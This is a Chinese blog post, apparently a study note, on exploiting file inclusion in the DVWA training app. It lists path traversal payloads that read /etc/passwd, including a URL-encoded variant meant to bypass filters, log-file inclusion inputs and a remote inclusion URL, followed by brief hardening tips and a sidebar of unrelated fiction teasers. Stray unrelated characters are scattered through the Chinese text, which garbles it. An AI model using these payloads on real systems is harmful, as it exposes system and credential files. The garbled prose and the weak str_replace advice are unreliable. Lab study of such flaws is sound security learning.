DVWA文件包含漏洞學(xué)習(xí)

文件包含分為LFI本地文件包含和RFI遠(yuǎn)程文件包含灭将,本次主要以本地文件包含為主進(jìn)行測試。

進(jìn)行到DVWA下的File Inclusion(文件包含)菜單下后控,進(jìn)入到file1.php頁面庙曙,獲取頁面格式為page=file1.php。

文件包含漏洞就是通過include函數(shù)將web根目錄以外的目錄的文件被包含進(jìn)來浩淘,首先測試是否將passwd文件包含捌朴,利用page=../../../../../../../etc/passwd吴攒,進(jìn)行提交;


passwd文件在頁面顯示出砂蔽,同時洼怔,還可以利用page=file:///etc/passwd,如果存在相關(guān)安全設(shè)備對etc/passwd等字符進(jìn)行了過濾,可以利用編碼后提交嘗試?yán)@過左驾,page=%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64


常見包含漏洞測試方法:

?file=../../../../../var/log/apache2/access.log

?page=file:///var/log/apache2/access.log

?home=main.cgi

?page=http://www.a.com/index.php

http://1.1.1.1/../../../../dir/file.txt

加固方法:

過濾或禁止敏感參數(shù)镣隶,其中以“../../”等目錄跳轉(zhuǎn)符號為主

盡量防止或不用動態(tài)文件包含

調(diào)用str_replace()函數(shù)實現(xiàn)相關(guān)敏感字符的過濾,可以防御了遠(yuǎn)程文件包含

?著作權(quán)歸作者所有,轉(zhuǎn)載或內(nèi)容合作請聯(lián)系作者
  • 人面猴
    序言:七十年代末诡右,一起剝皮案震驚了整個濱河市安岂,隨后出現(xiàn)的幾起案子,更是在濱河造成了極大的恐慌帆吻,老刑警劉巖域那,帶你破解...
    沈念sama閱讀 221,273評論 6 515
  • 死咒
    序言:濱河連續(xù)發(fā)生了三起死亡事件,死亡現(xiàn)場離奇詭異猜煮,居然都是意外死亡次员,警方通過查閱死者的電腦和手機,發(fā)現(xiàn)死者居然都...
    沈念sama閱讀 94,349評論 3 398
  • 救了他兩次的神仙讓他今天三更去死
    文/潘曉璐 我一進(jìn)店門友瘤,熙熙樓的掌柜王于貴愁眉苦臉地迎上來翠肘,“玉大人,你說我怎么就攤上這事辫秧∈叮” “怎么了?”我有些...
    開封第一講書人閱讀 167,709評論 0 360
  • 道士緝兇錄:失蹤的賣姜人
    文/不壞的土叔 我叫張陵盟戏,是天一觀的道長绪妹。 經(jīng)常有香客問我,道長柿究,這世上最難降的妖魔是什么邮旷? 我笑而不...
    開封第一講書人閱讀 59,520評論 1 296
  • ?港島之戀(遺憾婚禮)
    正文 為了忘掉前任,我火速辦了婚禮蝇摸,結(jié)果婚禮上婶肩,老公的妹妹穿的比我還像新娘。我一直安慰自己,他們只是感情好穆役,可當(dāng)我...
    茶點故事閱讀 68,515評論 6 397
  • 惡毒庶女頂嫁案:這布局不是一般人想出來的
    文/花漫 我一把揭開白布只怎。 她就那樣靜靜地躺著,像睡著了一般险毁。 火紅的嫁衣襯著肌膚如雪。 梳的紋絲不亂的頭發(fā)上,一...
    開封第一講書人閱讀 52,158評論 1 308
  • 城市分裂傳說
    那天畔况,我揣著相機與錄音鲸鹦,去河邊找鬼。 笑死跷跪,一個胖子當(dāng)著我的面吹牛馋嗜,可吹牛的內(nèi)容都是我干的。 我是一名探鬼主播域庇,決...
    沈念sama閱讀 40,755評論 3 421
  • 雙鴛鴦連環(huán)套:你想象不到人心有多黑
    文/蒼蘭香墨 我猛地睜開眼嵌戈,長吁一口氣:“原來是場噩夢啊……” “哼!你這毒婦竟也來了听皿?” 一聲冷哼從身側(cè)響起熟呛,我...
    開封第一講書人閱讀 39,660評論 0 276
  • 萬榮殺人案實錄
    序言:老撾萬榮一對情侶失蹤,失蹤者是張志新(化名)和其女友劉穎尉姨,沒想到半個月后庵朝,有當(dāng)?shù)厝嗽跇淞掷锇l(fā)現(xiàn)了一具尸體,經(jīng)...
    沈念sama閱讀 46,203評論 1 319
  • ?護(hù)林員之死
    正文 獨居荒郊野嶺守林人離奇死亡又厉,尸身上長有42處帶血的膿包…… 初始之章·張勛 以下內(nèi)容為張勛視角 年9月15日...
    茶點故事閱讀 38,287評論 3 340
  • ?白月光啟示錄
    正文 我和宋清朗相戀三年九府,在試婚紗的時候發(fā)現(xiàn)自己被綠了。 大學(xué)時的朋友給我發(fā)了我未婚夫和他白月光在一起吃飯的照片覆致。...
    茶點故事閱讀 40,427評論 1 352
  • 活死人
    序言:一個原本活蹦亂跳的男人離奇死亡侄旬,死狀恐怖,靈堂內(nèi)的尸體忽然破棺而出煌妈,到底是詐尸還是另有隱情儡羔,我是刑警寧澤,帶...
    沈念sama閱讀 36,122評論 5 349
  • ?日本核電站爆炸內(nèi)幕
    正文 年R本政府宣布璧诵,位于F島的核電站汰蜘,受9級特大地震影響,放射性物質(zhì)發(fā)生泄漏之宿。R本人自食惡果不足惜族操,卻給世界環(huán)境...
    茶點故事閱讀 41,801評論 3 333
  • 男人毒藥:我在死后第九天來索命
    文/蒙蒙 一、第九天 我趴在偏房一處隱蔽的房頂上張望比被。 院中可真熱鬧色难,春花似錦、人聲如沸等缀。這莊子的主人今日做“春日...
    開封第一講書人閱讀 32,272評論 0 23
  • 一樁弒父案,背后竟有這般陰謀
    文/蒼蘭香墨 我抬頭看了看天上的太陽项滑。三九已至依沮,卻和暖如春,著一層夾襖步出監(jiān)牢的瞬間枪狂,已是汗流浹背危喉。 一陣腳步聲響...
    開封第一講書人閱讀 33,393評論 1 272
  • 情欲美人皮
    我被黑心中介騙來泰國打工, 沒想到剛下飛機就差點兒被人妖公主榨干…… 1. 我叫王不留州疾,地道東北人辜限。 一個月前我還...
    沈念sama閱讀 48,808評論 3 376
  • 代替公主和親
    正文 我出身青樓,卻偏偏與公主長得像严蓖,于是被迫代替她去往敵國和親薄嫡。 傳聞我的和親對象是個殘疾皇子,可洞房花燭夜當(dāng)晚...
    茶點故事閱讀 45,440評論 2 359

推薦閱讀更多精彩內(nèi)容